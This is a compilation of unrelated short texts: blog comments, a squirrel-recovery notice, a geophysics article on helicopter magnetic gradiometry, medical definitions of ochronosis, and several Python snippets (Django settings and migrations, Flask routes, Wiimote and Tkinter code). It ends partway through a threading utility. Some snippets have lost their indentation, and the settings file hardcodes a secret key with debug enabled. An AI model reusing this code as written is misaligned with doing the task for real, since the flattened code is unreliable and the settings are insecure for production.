I'm glad your son has you because even if his teacher doesn't "get" this one, you do and you won't let him be stifled.
It leads back to what I said before. Technical grade vs Content grade. And the content is too subjective, so it isn't fair to grade that way. And I think English teachers have a hard job. But it's like writing an opinion piece, right? If the teacher didn't agree with their opinion, would they have automatically had a bad grade because of the teacher's personal beliefs? This isn't math, it's not quantitative with a right/wrong answer. So they need to remove all the qualitative aspects of it in order to grade fairly.
P.S. Your font color and background in the comments section make it impossible to read previous comments without highlighting them. You may want to darken one of those things.
So not fair! You shouldn't grade a paper on whether it's disturbing or not.
Three years ago my daughter wrote a horribly disturbing story. I couldn't believe it had come from her. However, I was proud of her at the same time for her tremendous writing ability! And, fortunately for us, her teacher agreed and felt completely fine with the content. I did feel very grateful for that, so I can imagine how you feel not receiving the kind of support your son should have gotten.
Solid, thoughtful points. To disturb is one of the purposes of narrative and if you strip it of evil you strip it of interest. Of course, we want to protect kids from gratuitous evil, or narrative that actually promotes or glorifies wrongdoing, but we can't keep them from knowing it exists - or they'll find out when we're not around!
|
#coding: utf-8
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 1.8.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '%=1d%f!jg072%x^01%j6-*_q@a431ep$%o0@59zux)ns3w$ghu'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'blog',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
)
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.8/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
|
Delmarva Fox Squirrel – Conservation Success Story!
Due to conservation efforts by states, landowners and other partners, the Delmarva Peninsula fox squirrel, one of the animals included on the first list of endangered species nearly half a century ago, has recovered. Based on extensive review of the best scientific and commercial data available, the U.S. Fish and Wildlife Service determined that the Delmarva fox squirrel, as it is more commonly called, is no longer in danger of extinction through all or a significant part of its range, and it is not likely to become so within the foreseeable future.
|
import cwiid
import time
import uinput
class WiiMote (object):
def __init__(self,addr=None):
#save the wiimote address for later reference
self.addr = addr
#connect to the wiimote
self.mote = None
while self.mote is None:
try:
self.mote = cwiid.Wiimote()
except RuntimeError as e:
print "failed to connect to wiimote."
#for debugging, turn 1 LED on.
self.mote.led = 1
self.ledNum = 1
#prepare the callback list:
self.calls = {
'2':None,
'1':None,
'b':None,
'a':None,
'minus':None,
'home':None,
'left':None,
'right':None,
'down':None,
'up':None,
'plus':None
}
#prep the reactor variable.
self.react = False
#turn on the wiimote's reporting for buttons
self.mote.rpt_mode = cwiid.RPT_BTN
#initialize the mouse controller
self.mouse = uinput.Device([
uinput.BTN_LEFT,
uinput.BTN_RIGHT,
uinput.REL_X,
uinput.REL_Y
])
self.lstate = 0
self.rstate = 0
def start(self):
'''
Start the reactor loop that listens for WiiMote events so the appropriate call back
can be called.
'''
self.react = True
while self.react:
time.sleep(0.01)
bstate = self.mote.state['buttons']
            if bstate % 2 and self.calls['2'] is not None:
                self.calls['2']()
            if bstate / 2 % 2 and self.calls['1'] is not None:
                self.calls['1']()
# if bstate / 4 % 2 and self.calls['b'] is not None:
# self.calls['b'](wm)
# if bstate / 8 % 2 and self.calls['a'] is not None:
# self.calls['a'](wm)
if bstate / 16 % 2 and self.calls['minus'] is not None:
self.calls['minus']()
if bstate / 128 % 2 and self.calls['home'] is not None:
self.calls['home']()
if bstate / 256 % 2 and self.calls['left'] is not None:
self.calls['left']()
if bstate / 512 % 2 and self.calls['right'] is not None:
self.calls['right']()
if bstate / 1024 % 2 and self.calls['down'] is not None:
self.calls['down']()
if bstate / 2048 % 2 and self.calls['up'] is not None:
self.calls['up']()
if bstate / 4096 % 2 and self.calls['plus'] is not None:
self.calls['plus']()
            leftClick(self)
            rightClick(self)
    def stop(self):
        '''
        stops the reactor loop.
        '''
        self.react = False
    def release(self):
        '''
        releases the wiimote, which should effectively turn it off.
        '''
        self.mote.close()
def testOut():
print wm.mote.state['buttons']
def callmeMaybe():
print "I was called!"
def countUp():
wm.ledNum = (wm.ledNum + 0.1) % 16
if wm.ledNum < 1:
wm.ledNum = 1
wm.mote.led = int(wm.ledNum)
def countDown():
wm.ledNum = (wm.ledNum - 0.1) % 16
if wm.ledNum < 1:
wm.ledNum = 16
wm.mote.led = int(wm.ledNum)
def mousetickDown():
mousetick(0,int(wm.ledNum))
def mousetickUp():
mousetick(0,int(-1*wm.ledNum))
def mousetickLeft():
mousetick(int(-1*wm.ledNum),0)
def mousetickRight():
mousetick(int(wm.ledNum),0)
def mousetick(x,y):
wm.mouse.emit(uinput.REL_X,x)
wm.mouse.emit(uinput.REL_Y,y)
def leftClick(wm):
state = wm.mote.state['buttons'] / 8 % 2
if state != wm.lstate:
wm.mouse.emit(uinput.BTN_LEFT,state)
# wm.mouse.emit(uinput.BTN_LEFT,1)
wm.lstate = state
def rightClick(wm):
    #mirror leftClick: B button is bit 4, emit BTN_RIGHT on state change
    state = wm.mote.state['buttons'] / 4 % 2
    if state != wm.rstate:
        wm.mouse.emit(uinput.BTN_RIGHT,state)
        wm.rstate = state
if __name__ == "__main__":
wm = WiiMote()
wm.calls['2'] = testOut
wm.calls['1'] = testOut
wm.calls['b'] = leftClick
wm.calls['a'] = rightClick
wm.calls['minus'] = countDown
wm.calls['home'] = callmeMaybe
wm.calls['left'] = mousetickLeft
wm.calls['right'] = mousetickRight
wm.calls['down'] = mousetickDown
wm.calls['up'] = mousetickUp
wm.calls['plus'] = countUp
wm.start()
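The reactor loop above decodes each button with integer division (`bstate / 2**n % 2`). An equivalent, cleaner decoding uses a bitwise AND; the bit values below are the ones implied by the divisions in `WiiMote.start()`, not anything taken from the cwiid documentation.

```python
# Decode a button-state integer into pressed button names.
# Bit values mirror the divisions used in WiiMote.start() above.
BUTTON_BITS = {
    1: '2', 2: '1', 4: 'b', 8: 'a', 16: 'minus', 128: 'home',
    256: 'left', 512: 'right', 1024: 'down', 2048: 'up', 4096: 'plus',
}

def decode_buttons(bstate):
    """Return the set of button names whose bits are set in bstate."""
    return {name for bit, name in BUTTON_BITS.items() if bstate & bit}
```

With this, the dispatch loop reduces to one pass over `decode_buttons(self.mote.state['buttons'])` instead of eleven division tests.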
|
This experiment was an attempt to show that what can be characterized as 'awareness' (or even 'intelligence') can be simulated using only very basic physics. The environment is a zero-gravity three dimensional space seeded with 'cubes' and 'food pellets.' Food pellets are regularly added to the space in random positions. If a cube connects with a food pellet the pellet is 'consumed' and the cube's lifespan is increased, and if it survives for long enough it will replicate itself. Each cube has six sides, and each side has a randomized 'polarity,' positive or negative. Positive sides of cubes are attracted to the negatively-charged food pellets while negative sides are repelled by them.
What results is the cubes having surprisingly evocative food-seeking behavior. Generally a cube will 'choose' a side, edge, or vertex around which its net attractive force is the strongest. This becomes the cube's 'front,' pointing towards and accelerating towards food.
The fact that negative sides repel food leads to the surprisingly effective emergent strategy of 'focusing' on one food pellet while ignoring others. This gives cubes with both negative and positive sides a distinct advantage over cubes which are generated with all-positive sides, as these cubes have difficulty finding food because they are 'distracted' by all of the food pellets around them.
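The polarity rule described above can be sketched in a few lines. This is an illustrative reconstruction, not the experiment's actual code: the inverse-square falloff, the function names, and the `strength` constant are all assumptions; only the sign convention (positive sides attracted to food, negative sides repelled) comes from the description.

```python
import math

def force_on_side(side_pos, side_polarity, pellet_pos, strength=1.0):
    """Force on one cube side (+1 or -1 polarity) from one food pellet.

    Positive polarity pulls the side toward the pellet; negative pushes
    it away. Falloff is assumed inverse-square.
    """
    dx = pellet_pos[0] - side_pos[0]
    dy = pellet_pos[1] - side_pos[1]
    dz = pellet_pos[2] - side_pos[2]
    r2 = dx * dx + dy * dy + dz * dz
    r = math.sqrt(r2)
    scale = side_polarity * strength / (r2 * r)  # unit vector / r^2
    return (dx * scale, dy * scale, dz * scale)

def net_force(sides, pellets):
    """Sum the force over every (position, polarity) side and every pellet."""
    total = [0.0, 0.0, 0.0]
    for pos, pol in sides:
        for pellet in pellets:
            f = force_on_side(pos, pol, pellet)
            for i in range(3):
                total[i] += f[i]
    return tuple(total)
```

The "front" a cube chooses is then simply the side, edge, or vertex whose summed attraction dominates the net force vector.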
|
import datetime
import time
from django import forms
from django.contrib.admin.widgets import FilteredSelectMultiple
from boar.articles.models import Article, Tag
from boar.articles.widgets import MarkItUpWidget
class ArticleAdminModelForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
# Make TagManager act like a ManyToManyField
if 'initial' not in kwargs:
kwargs['initial'] = {}
if kwargs.get('instance', None):
opts = self._meta.model._meta
for f in sorted(opts.fields + opts.many_to_many):
if f.name == 'tags':
if kwargs['instance'].pk is None:
kwargs['initial'][f.name] = []
else:
kwargs['initial'][f.name] = [obj.tag.pk for obj in f.value_from_object(kwargs['instance'])]
super(ArticleAdminModelForm, self).__init__(*args, **kwargs)
if 'pub_date' in self.initial and isinstance(self.initial['pub_date'], basestring):
self.initial['pub_date'] = datetime.datetime(*time.strptime(self.initial['pub_date'], '%Y-%m-%d %H:%M:%S')[:6])
summary = forms.CharField(
required=False,
widget=forms.Textarea(attrs={'id': 'summary', 'rows': '5', 'cols': '80'}),
help_text=Article._meta.get_field('summary').help_text
)
body = forms.CharField(
widget=MarkItUpWidget(),
help_text=Article._meta.get_field('body').help_text
)
tags = forms.ModelMultipleChoiceField(
queryset=Tag.objects.all(),
widget=FilteredSelectMultiple('Tags', False),
required=False,
help_text=Article._meta.get_field('tags').help_text
)
class Meta:
model = Article
class ArticleArchiveForm(forms.Form):
def __init__(self, *args, **kwargs):
        qs = kwargs.pop('qs')
super(ArticleArchiveForm, self).__init__(*args, **kwargs)
self.fields['month'].choices = [(d.strftime('%Y-%b').lower(), d.strftime('%B %Y')) for d in qs.dates('pub_date', 'month')]
month = forms.ChoiceField(choices=[])
|
Lake Washington School District (LWSD) is located between Lake Washington and the Cascade Mountains. The district is east of Seattle and covers 76 square miles. LWSD is the public school district for the cities of Kirkland, Redmond and about half of Sammamish. On the north end of the district, some Bothell and Woodinville residents also attend our schools. The district map shows school locations.
Note: grade levels may vary in choice schools. Schools that serve more than one grade level are counted in each grade level they serve.
|
import json
from flask import Blueprint, Response, request
from liebraryrest.models import Book, User, Booking
blueprint = Blueprint('books', __name__, url_prefix='/api/books')
@blueprint.route('')
def book_list():
return Response(json.dumps(Book.serialize_list(Book.query.all())),
mimetype='application/json',
status=200)
@blueprint.route('/<book_isbn>')
def book_show(book_isbn):
book = Book.get_by_isbn(book_isbn)
if book is not None:
return Response(book.to_json(),
mimetype='application/json',
status=200)
return Response(json.dumps("No book found with isbn {}".format(book_isbn)),
mimetype='application/json',
status=404)
@blueprint.route('/<book_isbn>/bookings', methods=['POST'])
def booking_on_a_book(book_isbn):
try:
request_body = json.loads(request.data.decode('UTF-8'))
user_id = request_body['user_id']
except (ValueError, KeyError):
return Response(
json.dumps("Invalid JSON or missing user_id param"),
mimetype='application/json',
status=400)
book = Book.get_by_isbn(book_isbn)
user = User.get_by_id(user_id)
if (book is not None) and (user is not None):
booking = Booking.get_by_isbn_and_user_id(book.isbn, user.id)
if booking is not None:
return Response(
json.dumps("This book {} is already on the booking list of user {}"
.format(book.isbn, user.id)),
mimetype='application/json',
status=400
)
if book.is_available():
book.quantity -= 1
book.save()
booking = Booking(book, user)
booking.save()
return Response(booking.to_json(),
mimetype='application/json',
status=201)
        return Response(json.dumps("Book {} is not available for booking".format(book_isbn)),
mimetype='application/json',
status=400)
return Response(json.dumps("Unable to find Book: {} or user: {}".format(book_isbn, user_id)),
mimetype='application/json',
status=404)
|
Mineral explorations require high-resolution aeromagnetic data for geological mapping and structural interpretations. Since direct detection of mineral deposits, for example gold, is not always possible, we have to rely on indirect detection of mineralized bodies by investigating the host rocks (geological mapping), traps, faults, shear zones (structures). The aeromagnetic data collected from the Tri-axial Gradiometer (HeliGrad) system meet those exploration needs.
Many of the advanced magnetic data interpretation techniques, such as the Euler Deconvolution (Reid et al, 1996), Source Parameter Imaging (Thurston and Smith, 1997), use magnetic gradients. Measured magnetic gradients do not depend on the Earth’s magnetic field and are not affected by diurnal variations. Therefore, the calculated magnetic grids can be made more accurate using the measured gradients (Hardwick, 1999 and Reford, 2004). Complex magnetic 2D or 3D inverse models can be better constrained and more easily resolved with gradient data. The magnetic data between the survey lines can be better extrapolated using the measured cross-line gradients.
The HeliGrad system (Figure 1a) is a helicopter-borne tri-axial magnetic gradiometer platform which collects full magnetic gradient data in three principle directions, in-line, cross-line and vertical (Figure 1b). The system uses a GPS receiver and a Gyro Inclinometer to provide positions and orientations of the gradiometers in real-time. Magnetic data distortions due to deviations from the horizontal, in-line and cross-line vertical planes of the gradiometers are corrected during post processing, therefore improving the quality of the final delivered magnetic data. The correction methods will be discussed.
Figure 1: A) HeliGrad tri-axial helicopter magnetic gradiometer system. B) HeliGrad tri-axial gradiometer configuration and dimensions. C) Opikeigen Lake Gold property location in the Uchi Subprovince of the Canadian Superior Province, in northern Ontario (courtesy SLAM Exploration Inc.).
The four magnetometers of the HeliGrad system are mounted on a rigid non-magnetic frame (Figure 1b). As a result, the relative positions of the four sensors remain unchanged. A GPS receiver and a Gyro Inclinometer are mounted on the platform to monitor its position and orientation at all times. The gradiometer can pitch drastically during climbs and when flying into a headwind, and it can swing from side to side in windy conditions. In order to provide true gradients along the ideal in-line, cross-line and vertical directions, tilt corrections must be applied to the magnetic data collected.
The magnetic data collected from the HeliGrad gradiometer system are corrected for spikes and diurnal variations. No lag correction is needed for magnetic data, since the position of the platform or bird GPS receiver is used as the data coordinate. However, some special corrections pertinent to gradiometer systems only must be applied to the data collected from the HeliGrad.
Since the HeliGrad gradiometer system is mounted on a rigid frame, the sensors positions are fixed with respect to each other. Therefore, one can work with the gradient vectors directly. The corrections applied to the gradient vectors are for the tilts of the platform. Tilts can be decomposed into three cardinal components, i.e. pitch, roll and yaw. The definitions of pitch, roll and yaw are given and illustrated in Figure 2a.
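The tilt correction just described amounts to rotating each measured gradient vector back from the tilted platform frame into the ideal in-line/cross-line/vertical frame. The sketch below is a minimal illustration assuming the attitude is given as pitch, roll and yaw angles in radians; the actual HeliGrad processing chain may use a different rotation convention and order.

```python
import numpy as np

def rotation_matrix(pitch, roll, yaw):
    """Platform attitude as a yaw * pitch * roll rotation (assumed order)."""
    cp, sp = np.cos(pitch), np.sin(pitch)
    cr, sr = np.cos(roll), np.sin(roll)
    cy, sy = np.cos(yaw), np.sin(yaw)
    Rx = np.array([[1, 0, 0], [0, cr, -sr], [0, sr, cr]])   # roll about x
    Ry = np.array([[cp, 0, sp], [0, 1, 0], [-sp, 0, cp]])   # pitch about y
    Rz = np.array([[cy, -sy, 0], [sy, cy, 0], [0, 0, 1]])   # yaw about z
    return Rz @ Ry @ Rx

def tilt_correct(gradient_measured, pitch, roll, yaw):
    """Undo the platform rotation: g_ideal = R^T @ g_measured."""
    R = rotation_matrix(pitch, roll, yaw)
    return R.T @ np.asarray(gradient_measured)
```

Because rotation matrices are orthogonal, applying the transpose exactly undoes the platform tilt, recovering the gradient components along the ideal axes.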
One can calculate gradients from Total Magnetic Intensity (TMI) data collected using a single magnetometer, by 1D FFT for the in-line and vertical gradients and by 2D FFT for the cross-line gradient. Under normal circumstances, the calculated in-line and vertical gradients are fairly comparable to the measured ones, except over very active magnetic areas. For the cross-line gradient, however, the calculated result is much inferior to the measured one (Figure 2b). In general, measured magnetic gradients are always better than calculated ones.
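The FFT route to gradients mentioned above rests on the Fourier derivative theorem: multiplying the spectrum by i·kx differentiates the profile. A minimal 1D sketch for the in-line gradient follows, assuming an evenly sampled and effectively periodic profile (real survey lines also need detrending and tapering first).

```python
import numpy as np

def fft_inline_gradient(tmi, dx):
    """In-line gradient of a 1D TMI profile via the FFT.

    Assumes even sampling at spacing dx and periodic data; multiply the
    spectrum by i*kx and transform back.
    """
    n = len(tmi)
    kx = 2.0 * np.pi * np.fft.fftfreq(n, d=dx)   # wavenumbers, rad per unit
    spectrum = np.fft.fft(tmi)
    return np.real(np.fft.ifft(1j * kx * spectrum))
```

On a smooth periodic profile this is essentially exact, which is why the calculated in-line gradient holds up well; it is the cross-line direction, where no along-profile sampling exists, that the calculation cannot match the measurement.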
The Opikeigen Lake Gold Property is jointly owned by SLAM and Beatrix Ventures Inc. It is situated 10 km northwest of Fort Hope, Ontario. The property is located within the Uchi Subprovince, Superior Province of the Canadian Shield (Figure 1c; Stott 2010). The Uchi Subprovince is a 600-kilometre long greenstone belt, extending from Ontario-Manitoba border to the Hudson Bay Lowlands, hosting the Pickle Lake and the very productive Red Lake gold camps (Technical Report, 2009). It is underlain by volcanic and sedimentary rocks. High grade gold mineralization is associated with quartz veins in sheared and altered mafic volcanics in contact with the sediments.
In the Opikeigen Lake area, the greenstone belt is composed of east trending, isoclinally folded sequence of metavolcanic and metasedimentary rocks, Figure 6. The sediments are overlain by a basal sequence of felsic volcaniclastics and an upper sequence of mafic flows with intervals of sediments including iron formation.
Contacts between the metavolcanics and metasediments and structural traps along faults or shear zones are places to search for gold deposits. The magnetic gradient data collected using the HeliGrad system can help to find those places.
The lithological contacts between the metavolcanics and metasediments, and zones of metavolcanics (Vf and Vm) and metasediments (Sm), are inferred from the Total Magnetic Intensity (TMI) data in Figure 3a. Lithological contacts usually track the local maxima of magnetic gradients. Zones of metavolcanics possess moderate to strong magnetic values, while the zones of metasediments exhibit low, especially background, magnetic values. Zones of Banded Iron Formation (BIF) are outlined as well. BIF have very strong magnetic responses.
Lineaments and faults are inferred from the tilt derivatives (Salem, 2008) computed directly from the measured magnetic gradients, in Figure 3b. Clearly shown are the SW-NE faults or shears cutting across the east trending sequences of metavolcanics and metasediments. The prospective zones of gold deposits are places where the faults intersect with the contacts, Figure 3c. It is quite clear that most of the interpreted gold prospective zones coincide with the known gold showing in the area.
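The tilt derivative (Salem, 2008) used above is the arctangent of the vertical gradient over the total horizontal gradient, so it can be computed directly from the three measured gradient components. A minimal sketch:

```python
import numpy as np

def tilt_derivative(gx, gy, gz):
    """Tilt-angle derivative from measured gradients:
    TDR = arctan( dT/dz / sqrt((dT/dx)^2 + (dT/dy)^2) ).
    gx, gy, gz are the in-line, cross-line and vertical gradients.
    """
    gx, gy, gz = (np.asarray(a, dtype=float) for a in (gx, gy, gz))
    horizontal = np.hypot(gx, gy)        # total horizontal gradient
    return np.arctan2(gz, horizontal)    # bounded to [-pi/2, pi/2]
```

Because the arctangent bounds the result regardless of anomaly amplitude, the tilt derivative equalizes strong and weak sources, which is what makes it effective for tracing lineaments and faults across units of very different magnetization.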
The usefulness of the magnetic data in mineral exploration, as demonstrated in Opikeigen Gold project, is without question. The magnetic gradients data collected by HeliGrad tri-axial gradiometer system provide a sound geophysical basis for geological mapping and structural interpretations.
The helicopter-borne full Tri-axial magnetic gradiometer (HeliGrad) system provides measured and tilt corrected gradient data in in-line, cross-line and vertical directions. The magnetic gradients data collected by the HeliGrad system can be used in geological mapping and structural interpretations. Tilt-angle derivatives, which use all the measured gradients, are very useful in delineating lineaments and faults, as demonstrated in the Opikeigen Gold Project, SLAM Exploration Inc.
Figure 3: A) Lithologic units inferred from Total magnetic Intensity (TMI) data (B) Interpreted geology, lineaments & faults over derived magnetic tilt-angle derivative; C) Interpreted prospective zones from magnetics over known geology, featuring gold occurrences.
|
# Generated by Django 3.0.7 on 2020-08-04 22:04
from random import choices, randint
from string import ascii_letters, digits, punctuation
from django.contrib.auth.hashers import UNUSABLE_PASSWORD_PREFIX, make_password
from django.db import migrations
# Just want to highlight that we are distinguishing between these two.
ALLAUTH_ACCOUNT_APP = "account"
LOOKIT_ACCOUNTS_APP = "accounts"
def at_least_six(chars):
return choices(chars, k=randint(6, 12))
def generate_valid_password():
"""Generate a random password of at least 18 characters.
Ensures that we're alphanumeric + punctuated.
"""
return "".join(
at_least_six(ascii_letters) + at_least_six(digits) + at_least_six(punctuation)
)
def shim_usable_passwords(apps, schema_editor):
"""Create usable passwords for OSF-based users.
This will force them to do a password reset.
"""
UserModel = apps.get_model(LOOKIT_ACCOUNTS_APP, "User") # noqa
for user in UserModel.objects.filter(
password__startswith=UNUSABLE_PASSWORD_PREFIX, is_researcher=True
):
user.password = make_password(generate_valid_password())
user.save()
DELETE_ALLAUTH_SQL = """
-- Remove Django migrations
DELETE FROM django_migrations
WHERE app IN ('{allauth_account_app_name}', 'socialaccount');
-- Get rid of permissions.
DELETE FROM auth_permission
WHERE content_type_id in (
SELECT id FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount')
);
-- Get rid of admin changes.
DELETE FROM django_admin_log
WHERE content_type_id in (
SELECT id FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount')
);
-- Delete the content types.
DELETE FROM django_content_type
WHERE app_label IN ('{allauth_account_app_name}', 'socialaccount');
-- Drop tables
DROP TABLE IF EXISTS account_emailconfirmation CASCADE;
DROP TABLE IF EXISTS account_emailaddress;
DROP TABLE IF EXISTS socialaccount_socialtoken CASCADE;
DROP TABLE IF EXISTS socialaccount_socialapp_sites CASCADE;
DROP TABLE IF EXISTS socialaccount_socialapp CASCADE;
DROP TABLE IF EXISTS socialaccount_socialaccount;
""".format(
allauth_account_app_name=ALLAUTH_ACCOUNT_APP
)
class Migration(migrations.Migration):
dependencies = [
("admin", "0003_logentry_add_action_flag_choices"),
# If we don't add the above, tests will fail due to the fact that
# we use a custom default admin site.
# TODO: Investigate why and where Django's test harness fails to create
# these models, and then either file a bug or use a better fix.
("accounts", "0048_add_otp_model"),
]
operations = [
migrations.RunSQL(DELETE_ALLAUTH_SQL),
migrations.RunPython(shim_usable_passwords),
]
|
Nexus are a single-source agency. We take care of everything so you don’t have to.
From artwork to typography, great design is at the core of everything we do.
Creative digital services, app development & web projects.
Beautifully crafted print for every purpose and specification, including merchandise.
Banner and exhibition stand solutions for all your event needs.
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
tkGAME - all-in-one Game library for Tkinter
Copyright (c) 2014+ Raphaël Seban <motus@laposte.net>
This program is free software: you can redistribute it and/or
modify it under the terms of the GNU General Public License as
published by the Free Software Foundation, either version 3 of
the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program.
If not, see http://www.gnu.org/licenses/
"""
# lib imports
from tkinter import ttk
class GameFrame (ttk.Frame):
r"""
Generic game frame component;
"""
def __init__ (self, master=None, **kw):
# super class inits
ttk.Frame.__init__(self, master)
self.configure(**self._only_tk(kw))
# member inits
self.tk_owner = master
# set widget contents
self.init_widget(**kw)
# end def
def _only_tk (self, kw):
r"""
protected method def;
filters external keywords to suit tkinter init options;
returns filtered dict() of keywords;
"""
# inits
_dict = dict()
# $ 2014-02-24 RS $
# Caution:
# TK widget *MUST* be init'ed before calling _only_tk() /!\
# self.configure() needs self.tk to work well
if hasattr(self, "tk") and hasattr(self, "configure"):
_attrs = set(self.configure().keys()) & set(kw.keys())
for _key in _attrs:
_dict[_key] = kw.get(_key)
# end for
# end if
return _dict
# end def
def init_widget (self, **kw):
r"""
this should be overridden in subclass;
"""
# put here your own code in subclass
pass
# end def
# end class GameFrame
|
a peculiar discoloration of body tissues caused by deposit of alkapton bodies as the result of a metabolic disorder.
ocular ochronosis brown or gray discoloration of the sclera, sometimes involving also the conjunctivae and eyelids.
A rare, autosomal recessive disease characterized by alkaptonuria with pigmentation of the cartilages and sometimes tissues such as muscle, epithelial cells, and dense connective tissue; may affect also the sclera, mucous membrane of the lips, and skin of the ears, face, and hands, and cause standing urine to be dark colored and contain pigmented casts; pigmentation is thought to result from oxidized homogentisic acid, and cartilage degeneration results in osteoarthritis, particularly of the spine.
an inherited error of protein metabolism characterized by an accumulation of homogentisic acid, resulting in degenerative arthritis and brown-black pigment deposited in connective tissue and cartilage. It is often caused by alkaptonuria or poisoning with phenol. Bluish macules may be noted on the sclera, fingers, ears, nose, genitalia, buccal mucosa, and axillae. Urine color may be dark. See also alkaptonuria.
A condition observed in people with alkaptonuria, characterized by pigmentation of the cartilages; also may affect the sclerae, mucous membrane of the lips, and skin of the ears, face, and hands and may cause standing urine to be dark and contain pigmented casts; pigmentation results from oxidized homogentisic acid; cartilage degeneration results in osteoarthritis.
Persistent joint disease associated with blue or brownish discoloration of the joint cartilages occurring in patients with ALKAPTONURIA.
People with this rare hereditary condition tend to develop arthritis in adulthood.
n. condition marked by accumulation of black-brown pigment in cartilage, joint capsules, and other connective tissues as a result of alkaptonuria, which is a metabolic disorder resulting in accumulation of homogentisic acid. See also alkaptonuria.
a yellow, brown or chocolate discoloration of cartilage, tendon sheaths and ligaments but not bone. Caused by deposit of alkapton bodies as the result of a metabolic disorder. Affected parts must be condemned as not suitable for human consumption.
|
# Copyright 2016 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Implements threading utilities
Written by Bruno Moura <brunotm@gmail.com>
"""
import threading
import logging
from weakref import WeakValueDictionary
class LockManager(object):
"""
Thread safe lock manager class
"""
def __init__(self):
self._lock = get_lock()
self._lock_store = WeakValueDictionary()
def get_lock(self, lockname, reentrant=False):
"""
        Create or return an existing lock identified by lockname.
"""
with self._lock:
try:
lock = self._lock_store[lockname]
# logging.debug("LockManager.get_lock: existing lock: %s, %s",
# lockname, lock)
except KeyError:
lock = get_lock(reentrant)
self._lock_store[lockname] = lock
# logging.debug("LockManager.get_lock: new lock: %s, %s",
# lockname, lock)
# logging.debug("LockManager existing locks in store: %s",
# self._list_locks())
return lock
def _list_locks(self):
return self._lock_store.keys()
def list_locks(self):
"""
Return a list of existing lock names in lock store.
"""
with self._lock:
return self._list_locks()
def get_lock_decorator(reentrant=False):
"""
Create a locking decorator to be used in modules
"""
# Lock to be used in the decorator
lock = get_lock(reentrant)
def lock_decorator(func):
"""
Locking decorator
"""
def protected(*args, **kwargs):
"""
Locking wrapper
"""
# Get lock memory address for debugging
lockaddr = hex(id(lock))
# logging.debug("Trying to acquire lock: %s @ %s, caller: %s, args: %s %s",
# lock, lockaddr, func.__name__, args, kwargs)
with lock:
# logging.debug("Acquired lock: %s @ %s, caller: %s, args: %s %s",
# lock, lockaddr, func.__name__, args, kwargs)
return func(*args, **kwargs)
return protected
return lock_decorator
def start_new_thread(target, args=None, daemon=False):
"""Start a new thread"""
new_thread = None
if args:
new_thread = threading.Thread(target=target, args=args)
else:
new_thread = threading.Thread(target=target)
if daemon:
new_thread.daemon = True
new_thread.start()
    logging.info("Started new thread : %s with target %s and args %s",
                 new_thread.ident, target, args)
    logging.debug("Currently active threads: %s",
                  get_active_threads())
    return new_thread
def get_active_threads():
"""Return the list of active thread objects"""
return threading.enumerate()
def get_local_storage():
"""Return a thread local storage object"""
return threading.local()
def set_thread_name(name):
"""Set the current thread name"""
threading.current_thread().name = name
def get_thread_name():
"""Get the current thread name"""
return threading.current_thread().name
def get_lock(reentrant=False):
    """Return an unmanaged thread Lock or RLock"""
if reentrant:
return threading.RLock()
else:
return threading.Lock()
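A small self-contained usage sketch of the `get_lock_decorator` pattern above (the function name `bump` and the counts are illustrative): every call to the decorated function is serialized through one shared lock, so concurrent read-modify-write increments never race.

```python
import threading

def get_lock_decorator(reentrant=False):
    """Build a decorator that serializes calls through one shared lock."""
    lock = threading.RLock() if reentrant else threading.Lock()

    def lock_decorator(func):
        def protected(*args, **kwargs):
            with lock:
                return func(*args, **kwargs)
        return protected
    return lock_decorator

serialized = get_lock_decorator()
counter = {"n": 0}

@serialized
def bump():
    # read-modify-write that could race without the lock
    counter["n"] += 1

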